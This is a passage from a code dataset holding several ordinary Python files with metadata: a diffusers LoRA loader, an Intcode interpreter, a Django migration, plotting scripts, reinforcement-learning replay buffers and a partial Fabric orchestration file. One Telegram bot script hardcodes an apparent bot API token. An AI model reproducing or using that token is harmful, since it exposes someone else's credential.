{"api_name": "scripts.General", "line_number": 218, "usage_type": "name"}, {"api_name": "scripts.General.time_ms", "line_number": 219, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 219, "usage_type": "name"}]} +{"seq_id": "23561779494", "text": "from diffusers import DiffusionPipeline\nfrom diffusers.loaders import LoraLoaderMixin\nimport torch\n\n\ndef load_lora_weights(unet, text_encoder, input_dir):\n lora_state_dict, network_alphas = LoraLoaderMixin.lora_state_dict(input_dir)\n LoraLoaderMixin.load_lora_into_unet(\n lora_state_dict, network_alphas=network_alphas, unet=unet\n )\n LoraLoaderMixin.load_lora_into_text_encoder(\n lora_state_dict, network_alphas=network_alphas, text_encoder=text_encoder\n )\n return unet, text_encoder\n\n\ndef get_pipeline(model_dir, lora_weights_dir=None):\n pipeline = DiffusionPipeline.from_pretrained(model_dir, torch_dtype=torch.float16)\n if lora_weights_dir:\n unet = pipeline.unet\n text_encoder = pipeline.text_encoder\n print(f\"Loading LoRA weights from {lora_weights_dir}\")\n unet, text_encoder = load_lora_weights(unet, text_encoder, lora_weights_dir)\n pipeline.unet = unet\n pipeline.text_encoder = text_encoder\n return pipeline\n", "repo_name": "ray-project/ray", "sub_path": "doc/source/templates/05_dreambooth_finetuning/dreambooth/generate_utils.py", "file_name": "generate_utils.py", 
"file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28715, "dataset": "github-code", "pt": "86", "api": [{"api_name": "diffusers.loaders.LoraLoaderMixin.lora_state_dict", "line_number": 7, "usage_type": "call"}, {"api_name": "diffusers.loaders.LoraLoaderMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "diffusers.loaders.LoraLoaderMixin.load_lora_into_unet", "line_number": 8, "usage_type": "call"}, {"api_name": "diffusers.loaders.LoraLoaderMixin", "line_number": 8, "usage_type": "name"}, {"api_name": "diffusers.loaders.LoraLoaderMixin.load_lora_into_text_encoder", "line_number": 11, "usage_type": "call"}, {"api_name": "diffusers.loaders.LoraLoaderMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "diffusers.DiffusionPipeline.from_pretrained", "line_number": 18, "usage_type": "call"}, {"api_name": "diffusers.DiffusionPipeline", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.float16", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "11217990936", "text": "import copy\nimport json\n\n\nclass Memory(object):\n def __init__(self, code):\n self._memory = code\n self._memory.extend([0] * len(code))\n\n def write(self, index, element):\n self.extend_if_needed(index)\n self._memory[index] = element\n\n def read(self, index):\n self.extend_if_needed(index)\n return self._memory[index]\n\n def extend_if_needed(self, index):\n while index > len(self._memory):\n new_length = int(len(self._memory) * 1.5)\n self._memory.extend([0] * new_length)\n\n def read_all(self):\n return copy.deepcopy(self._memory)\n\n def get_length(self):\n return len(self._memory)\n\n\nclass Intcode(object):\n \"\"\"The Intcode computer that is used in The Advent Of Code\n\n Attributes:\n program: Program that is being run on the computer.\n pr_input: An array with the initial input to the program.\n index: Current value of the instruction pointer\n \"\"\"\n\n def __init__(self, program, pr_input):\n self.memory = Memory(program)\n self._pr_input = copy.deepcopy(pr_input)\n self.index = 0\n self._pr_output = []\n self.info = Intcode.get_action_info()\n self.relative_base = 0\n\n @staticmethod\n def get_action_info():\n with open('action_data.json', 'r') as data_file:\n data = data_file.read()\n\n return json.loads(data)\n\n @staticmethod\n def _prepend_modes(modes, num_ops):\n \"\"\"Append omitted zeroes to the modes\"\"\"\n return modes + ((num_ops - len(modes)) * '0')\n\n def add_input(self, value):\n self._pr_input.append(value)\n\n def do_operation(self, data):\n self.index += 1\n\n memory = self.memory\n operation = data['operation']\n if operation == '1':\n memory.write(data['result'], data['operand1'] + data['operand2'])\n elif operation == '2':\n memory.write(data['result'], data['operand1'] * data['operand2'])\n elif operation == '3':\n memory.write(data['result'], self._pr_input.pop(0))\n elif operation == '4':\n self._pr_output.append(data['operand1'])\n elif operation == '5':\n if data['operand1'] != 0:\n self.index = data['operand2']\n elif operation == '6':\n if data['operand1'] == 0:\n self.index = data['operand2']\n elif operation == '7':\n if data['operand1'] < data['operand2']:\n memory.write(data['result'], 1)\n else:\n memory.write(data['result'], 0)\n elif operation == '8':\n if data['operand1'] == data['operand2']:\n memory.write(data['result'], 1)\n else:\n memory.write(data['result'], 0)\n elif operation == '9':\n self.relative_base += data['operand1']\n else:\n raise ValueError(\"Invalid action 
{0}\".format(operation))\n\n def get_operand(self, mode):\n memory = self.memory\n if mode is '0':\n return memory.read(memory.read(self.index))\n elif mode is '1':\n return memory.read(self.index)\n elif mode is '2':\n address = self.relative_base + memory.read(self.index)\n return memory.read(address)\n else:\n raise ValueError(\"Invalid mode {0}\".format(mode))\n\n def get_operation_data(self, action):\n operation = action[-1]\n data = {'operation': operation}\n\n num_ops = self.info[action[-1]]['operands']\n modes = Intcode._prepend_modes(action[:-2][::-1], num_ops + 1)\n for op_count in range(0, num_ops):\n self.index += 1\n data[\"operand{}\".format(op_count + 1)] = self.get_operand(modes[op_count])\n\n if self.info[operation]['result']:\n self.index += 1\n if modes[-1] == '2':\n address= self.relative_base + self.memory.read(self.index)\n data['result'] = address\n else:\n data[\"result\"] = self.get_operand('1')\n\n return data\n\n def run(self):\n memory = self.memory\n\n while self.index < memory.get_length():\n action = str(memory.read(self.index))\n\n if action == '99':\n break\n\n operation = action[-1]\n if operation == '3' and len(self._pr_input) == 0:\n # Freeze program\n break\n\n op_data = self.get_operation_data(action)\n self.do_operation(op_data)\n\n output_so_far = copy.deepcopy(self._pr_output)\n self._pr_output = []\n return output_so_far\n\n\ndef run_program(program, pr_input=None):\n if pr_input is None:\n pr_input = []\n intcode = Intcode(program, pr_input)\n return intcode.run()\n\n", "repo_name": "MilenOrfeev/aoc", "sub_path": "intcode.py", "file_name": "intcode.py", "file_ext": "py", "file_size_in_byte": 4801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "copy.deepcopy", "line_number": 24, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 41, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 52, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "71006031006", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django_pgjson.fields\nfrom django.conf import settings\nimport django.contrib.postgres.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('monitors', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CertificateMonitor',\n fields=[\n ('created', models.DateTimeField(auto_now_add=True)),\n ('modified', models.DateTimeField(auto_now=True)),\n ('lookup_interval', models.IntegerField()),\n ('next_lookup', models.DateTimeField()),\n ('last_hosts', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=254), blank=True, null=True, size=None)),\n ('certificate_value', models.TextField(serialize=False, primary_key=True)),\n ('resolutions', django_pgjson.fields.JsonField()),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('tags', models.ManyToManyField(blank=True, to='monitors.IndicatorTag')),\n ],\n ),\n migrations.AlterField(\n model_name='indicatoralert',\n name='indicator',\n field=models.TextField(),\n ),\n migrations.AlterField(\n model_name='indicatoralert',\n name='message',\n field=models.TextField(),\n ),\n migrations.AlterUniqueTogether(\n name='certificatemonitor',\n unique_together=set([('owner', 'certificate_value')]),\n ),\n ]\n", "repo_name": 
"armyninja/cyber", "sub_path": "monitors/migrations/0002_certificate_monitors_and_ulimited_alert_text.py", "file_name": "0002_certificate_monitors_and_ulimited_alert_text.py", "file_ext": "py", "file_size_in_byte": 1712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.contrib.postgres.fields.ArrayField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.contrib", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django_pgjson.fields.fields.JsonField", "line_number": 27, "usage_type": "call"}, {"api_name": "django_pgjson.fields.fields", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django_pgjson.fields", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 37, "usage_type": "name"}, {"api_name": 
"django.db.models.TextField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterUniqueTogether", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "12054521859", "text": "import requests\nfrom bs4 import BeautifulSoup\n\n\nurl = \"http://python123.io/ws/demo.html\"\nr = requests.get(url)\ndemo = r.text\nsoup = BeautifulSoup(demo, \"html.parser\")\ntag = soup.a # 返回第一个\nprint(\"type(tag):\"+str(type(tag)))\nprint(\"type(tag.attr):\"+str(type(tag.attrs)))\n\n\n\n", "repo_name": "konsydong/python_requests", "sub_path": "Requests/week2/soupelement.py", "file_name": "soupelement.py", "file_ext": "py", "file_size_in_byte": 283, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "72292078044", "text": "import http.server\nimport socketserver\nimport time\nfrom PostgresDatabase import PostgresDatabase\n\ndef build_html():\n \"\"\"! Connect to the database, get all items, close connection, build the html.\n \"\"\"\n # conn = psql.connect()\n p = '<tr><td>Id</td><td>Author</td><td>Quote</td></tr>'\n db = PostgresDatabase()\n db.connect()\n if db.connection:\n db.execute('SELECT * FROM quotes')\n result = db.cursor.fetchall()\n db.close()\n\n for row in result:\n # for displaying an image\n # item = f'<tr><td>{row[0]}</td><td>{row[1]}</td><td><img src=\"{row[2]}\" alt=\"\" height=100 width=100 /></td>'\n item = f'<tr><td>{row[0]} </td><td>{row[1]} </td><td>{row[2]}</td>'\n p = p + item\n\n contents = f'''<!DOCTYPE html>\n <html>\n <body>\n <table>\n {p}\n </table>\n </body>\n </html>\n '''\n filename = 'index.html'\n return contents, filename\n\ndef main():\n \"\"\"! Main function that opens the webpage. 
The module-level while loop calls main() to rebuild the page before the server starts.\n \"\"\"\n contents, filename = build_html()\n output = open(filename,\"w\")\n output.write(contents)\n output.close()\n\nclass MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/':\n self.path = 'index.html'\n return http.server.SimpleHTTPRequestHandler.do_GET(self)\n\nwhile True:\n # time.sleep(10)\n main()\n # Create an object of the above class\n handler_object = MyHttpRequestHandler\n\n PORT = 8080\n my_server = socketserver.TCPServer((\"\", PORT), handler_object)\n # find site at localhost:8080 or 127.0.0.1:8080 in browser\n\n # Start the server\n my_server.serve_forever()", "repo_name": "borchr27/lux_project", "sub_path": "docker/frontend/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "PostgresDatabase.PostgresDatabase", "line_number": 11, "usage_type": "call"}, {"api_name": "http.server.server", "line_number": 44, "usage_type": "attribute"}, {"api_name": "http.server", "line_number": 44, "usage_type": "name"}, {"api_name": "http.server.server.SimpleHTTPRequestHandler.do_GET", "line_number": 48, "usage_type": "call"}, {"api_name": "http.server.server", "line_number": 48, "usage_type": "attribute"}, {"api_name": "http.server", "line_number": 48, "usage_type": "name"}, {"api_name": "socketserver.TCPServer", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "34625356805", "text": "from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\nimport telepot\nfrom telepot.loop import MessageLoop\nimport execute2\nfrom multiprocessing import Process, Queue\n\nchat_id = \"473099318\"\nTelegram_Token = '1435246331:AAEuTzd96pMR8ACXl92za8CSFo_0gd1QCvY'\n\ndef hello(update: Update, context: CallbackContext) -> None:\n bot.sendMessage(chat_id, \"Everything is fine :)\")\n \ndef start(update: Update, context: CallbackContext) -> None:\n bot.sendMessage(chat_id, \"Ich mach noch nix\")\n execute2.run = True\n p = Process(target=fire_and_forget, args=())\n # you have to set daemon true to not have to wait for the process to join\n p.daemon = True\n p.start()\n print(\"doing stuff in the background\")\n \n\ndef stop(update: Update, context: CallbackContext) -> None:\n bot.sendMessage(chat_id, \"Ich mach noch nix\")\n execute2.run = False\n\ndef fire_and_forget(): \n execute2.measure()\n\nx=1\nx=x+1\nprint(x)\n\nbot = telepot.Bot(Telegram_Token)\nupdater = Updater(Telegram_Token)\n\ndp = updater.dispatcher # The dispatcher makes sure that new commands are picked up\ndp.add_handler(CommandHandler(\"start\", start))\ndp.add_handler(CommandHandler(\"stop\", stop))\n\nupdater.dispatcher.add_handler(CommandHandler('hello', hello))\n\nupdater.start_polling()\nupdater.idle()", "repo_name": "spmk/ADP3DDruck", "sub_path": "test2.py", "file_name": "test2.py", "file_ext": "py", "file_size_in_byte": 1315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "telegram.Update", "line_number": 11, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 11, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 14, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 14, "usage_type": "name"}, {"api_name": "execute2.run", "line_number": 16, 
"usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 17, "usage_type": "call"}, {"api_name": "telegram.Update", "line_number": 24, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 24, "usage_type": "name"}, {"api_name": "execute2.run", "line_number": 26, "usage_type": "attribute"}, {"api_name": "execute2.measure", "line_number": 29, "usage_type": "call"}, {"api_name": "telepot.Bot", "line_number": 35, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 36, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "4482295500", "text": "from collections import deque, namedtuple\nimport numpy as np\nimport torch\nfrom torch.nn.utils.rnn import pad_sequence\n\n\nExperience = namedtuple('Experience', field_names=['state', 'action', 'reward',\n 'done', 'new_state'])\n\n\nclass Episode:\n def __init__(self, observations, actions, rewards, dones):\n self.observations = observations\n self.actions = actions\n self.rewards = rewards\n self.dones = dones\n\n def __len__(self):\n return len(self.observations)\n\n\nclass EpisodeReplayBuffer:\n def __init__(self, buffer_capacity, use_n_newest=0):\n self.buffer = deque(maxlen=buffer_capacity)\n self.use_n_newest = use_n_newest\n\n def __len__(self):\n return len(self.buffer)\n\n def append(self, episode):\n self.buffer.append(episode)\n\n def sample(self, sample_size):\n sample_indices = np.random.choice(self.__len__(),\n size=sample_size,\n replace=False)\n if self.use_n_newest > 0:\n replace_indices = []\n for i in range(1, self.use_n_newest + 1):\n index = self.__len__() - i - 1\n if index not in sample_indices:\n sample_indices[-i] = index\n\n episodes = [self.buffer[i] for i in sample_indices]\n episode_lengths = [len(e) for e in episodes]\n seq_len = np.max(episode_lengths)\n fill_mask = torch.zeros((sample_size, seq_len - 1))\n for i in range(sample_size):\n fill_mask[i, :len(episodes[i]) - 1] = 1\n\n obs = [torch.tensor(e.observations, dtype=torch.float32) \\\n for e in episodes]\n a = [torch.tensor(e.actions, dtype=torch.int64) \\\n for e in episodes]\n r = [torch.tensor(e.rewards, dtype=torch.float32) \\\n for e in episodes]\n done = [torch.tensor(e.dones, dtype=torch.int64) \\\n for e in episodes]\n\n obs = pad_sequence(obs, batch_first=True)\n a = pad_sequence(a, batch_first=True)\n r = pad_sequence(r, batch_first=True)\n done = pad_sequence(done, batch_first=True)\n\n return obs, a, r, done, fill_mask\n\n\nclass ReplayBuffer:\n def __init__(self, capacity):\n self.buffer = deque(maxlen=capacity)\n\n def __len__(self):\n return len(self.buffer)\n\n def append(self, experience):\n self.buffer.append(experience)\n\n def sample(self, batch_size):\n indices = np.random.choice(len(self.buffer), batch_size, replace=False)\n states, actions, rewards, dones, next_states = zip(*[self.buffer[idx] for idx in indices])\n\n return (np.array(states), np.array(actions), np.array(rewards, dtype=np.float32),\n np.array(dones, dtype=np.bool), np.array(next_states))\n", "repo_name": "ajlangley/deep-coordination-graphs", "sub_path": "src/replay_buffer.py", "file_name": "replay_buffer.py", "file_ext": "py", "file_size_in_byte": 2846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", 
"api": [{"api_name": "collections.namedtuple", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 57, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 63, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 83, "usage_type": "attribute"}]} +{"seq_id": "38775954120", "text": "# Import the required Libraries\nfrom tkinter import *\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\n# Create an instance of Tkinter frame\nwin = Tk()\n\n# Set the geometry of tkinter frame\nwin.geometry(\"750x250\")\n\n\ndef Sub_Plot(axis, subplot_x, sublplot_y, x_data, y_data, plot_title, plot_x_label, plot_y_label):\n axis[subplot_x, sublplot_y].plot(x_data, y_data)\n axis[subplot_x, sublplot_y].set_title(plot_title)\n axis[subplot_x, sublplot_y].set_xlabel(plot_x_label)\n axis[subplot_x, sublplot_y].set_ylabel(plot_y_label)\n\n\ndef graph():\n df = pd.read_csv('data.csv')\n df_column_names = list(df.columns)[1:]\n columns_num = len(df_column_names)\n instruments_num = int((len(df_column_names) - 1) / 2)\n print(df_column_names)\n print(\"Number of columns:\", columns_num)\n print(\"Number of instruments:\", instruments_num)\n fig, axs = plt.subplots(instruments_num, 3)\n column_pointer = 1\n for i in range(0, instruments_num):\n Sub_Plot(axis=axs,\n subplot_x=i,\n sublplot_y=0,\n x_data=df[df_column_names[column_pointer]].values,\n y_data=df[df_column_names[column_pointer + 1]].values,\n plot_title=df_column_names[column_pointer][0:7],\n plot_x_label=df_column_names[column_pointer][7:],\n plot_y_label=df_column_names[column_pointer + 1][7:])\n Sub_Plot(axis=axs,\n subplot_x=i,\n sublplot_y=1,\n x_data=df[df_column_names[0]].values,\n y_data=df[df_column_names[column_pointer]].values,\n plot_title=df_column_names[column_pointer][0:7],\n plot_x_label=df_column_names[0],\n 
plot_y_label=df_column_names[column_pointer][7:])\n Sub_Plot(axis=axs,\n subplot_x=i,\n sublplot_y=2,\n x_data=df[df_column_names[0]].values,\n y_data=df[df_column_names[column_pointer + 1]].values,\n plot_title=df_column_names[column_pointer][0:7],\n plot_x_label=df_column_names[0],\n plot_y_label=df_column_names[column_pointer + 1][7:])\n column_pointer += 2\n fig.tight_layout()\n plt.show()\n\n\n# Create a button to show the plot\nButton(win, text=\"Show Graph\", command=graph).pack(pady=20)\nwin.mainloop()\n", "repo_name": "CAMMS-Duke-University/Source-Meter-PyMeasure", "sub_path": "examples_plots/static_plot_3.py", "file_name": "static_plot_3.py", "file_ext": "py", "file_size_in_byte": 2400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "25611188266", "text": "import matplotlib.pyplot as plt\nfrom matplotlib import style\nimport csv\n\ndef loss_graph(file_name, graph_type):\n\tpath = \"csv/\" + file_name + \".csv\"\n\tx = []\n\ty = []\n\twith open(path, 'r') as csvfile:\n\t\tplots = csv.reader(csvfile, delimiter=',')\n\t\tnext(plots, None)\n\t\tfor row in plots:\n\t\t\tx.append(int(row[1]))\n\t\t\ty.append(round(float(row[2]), 4))\n\tplt.plot(x,y,label=graph_type)\n\tplt.xlabel('Épocas')\n\tif(graph_type=='validation_accuracy'):\n\t\tplt.title('Acurácia de validade')\n\t\tplt.ylabel('Acurácia')\n\telif(graph_type=='train_accuracy'):\n\t\tplt.title('Acurácia de treino')\n\t\tplt.ylabel('Acurácia')\n\telif(graph_type=='train_loss'):\n\t\tplt.title('Perda da etapa de treino')\n\t\tplt.ylabel('Erro')\n\telif(graph_type=='validation_loss'):\n\t\tplt.title('Perda da etapa de validação')\n\t\tplt.ylabel('Erro')\n\n\tplt.legend()\n\tplt.show()\n\nloss_graph(\"Arch5_val_acc\", \"validation_accuracy\")\nloss_graph(\"Arch5_train_acc\", \"train_accuracy\")\nloss_graph(\"Arch5_train_loss\", \"train_loss\")\nloss_graph(\"Arch5_val_loss\", \"validation_loss\")", "repo_name": "RickSaitamaSanchez/Neural_Networks", "sub_path": "Speech_Recognition_LSTM/graph_plot.py", "file_name": "graph_plot.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "csv.reader", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.ylabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "40883472284", "text": "#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"Orchestration template\n\nThe following tasks must be implemented:\n - start\n - stop\n - restart\n - status\n\nAn instance endpoint has to be provided using the CLUSTERDN environment variable.\nFor example:\n\n CLUSTERDN=\"instances/test/reference/1.0.0/1\"\n\nA fabric roledef is created for each service defined in the registry.\nIt can be used with the decorator: @roles('servicename1')\n\nWARN: The hosts are accesed using the IP address of the first network device,\nusually eth0.\n\nThe properties of a given service can be accessed through:\n\n SERVICES['servicename'].propertyname\n\nfor example:\n\n SERVICES['namenode'].heap\n # If the property has dots we can use\n SERVICES['datanode'].get('dfs.blocksize')\n # Or even define a default value in case it does not exist\n SERVICES['datanode'].get('dfs.blocksize', '134217728')\n\nDetails about a given node can be obtained through each Node object returned by service.nodes\n\nThe fabfile can be tested running it in NOOP mode (testing mode) exporting a NOOP env variable.\n\nRequired roles: initiator, responders, peerback\n\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nfrom fabric.api import *\nfrom fabric.colors import red, green, yellow\nfrom fabric.contrib.files import exists\n# FIXME: Installing configuration-registry with pip and importing registry directly does not work\n# inside the fabfile. 
Temporarily it is copied manually in the utils directory\n#from utils import registry\n# In the big data nodes configuration-registry is installed globally\nimport registry\nimport time\nfrom pprint import pprint\n\n\n# Maximum number of retries to wait for a node to change to status running\nMAX_RETRIES = 100\n# Seconds between retries\nDELAY = 5\n\n\ndef eprint(*args, **kwargs):\n \"\"\"Print to stderr\"\"\"\n print(*args, file=sys.stderr, **kwargs)\n\n\nif os.environ.get('CLUSTERDN'):\n CLUSTERDN = os.environ.get('CLUSTERDN')\nelse:\n eprint(red('An instance endpoint has to be provided using the CLUSTERDN environment variable'))\n sys.exit(2)\n\nif os.environ.get('REGISTRY'):\n REGISTRY = os.environ.get('REGISTRY')\nelse:\n REGISTRY = 'http://consul.service.int.cesga.es:8500/v1/kv'\n\n# Retrieve info from the registry\nregistry.connect(REGISTRY)\ncluster = registry.Cluster(CLUSTERDN)\nnodes = cluster.nodes\nservices = cluster.services\n\n\ndef wait_until_node_is_running(node):\n \"\"\"Wait until node is in status running: i.e. docker-executor finished\"\"\"\n name = node.name\n retry = 0\n while not node.status == 'running':\n retry += 1\n if retry > MAX_RETRIES: sys.exit(3)\n print('Waiting for node {}: {}/{}'.format(name, retry, MAX_RETRIES))\n time.sleep(DELAY)\n\n\ndef get_node_address_for_fabric(node):\n \"\"\"Return the network address to be used by fabric to connect to the node\n\n By convention the address used is the address of its first network interface\n \"\"\"\n return node.networks[0].address\n\n\n# Expose the relevant 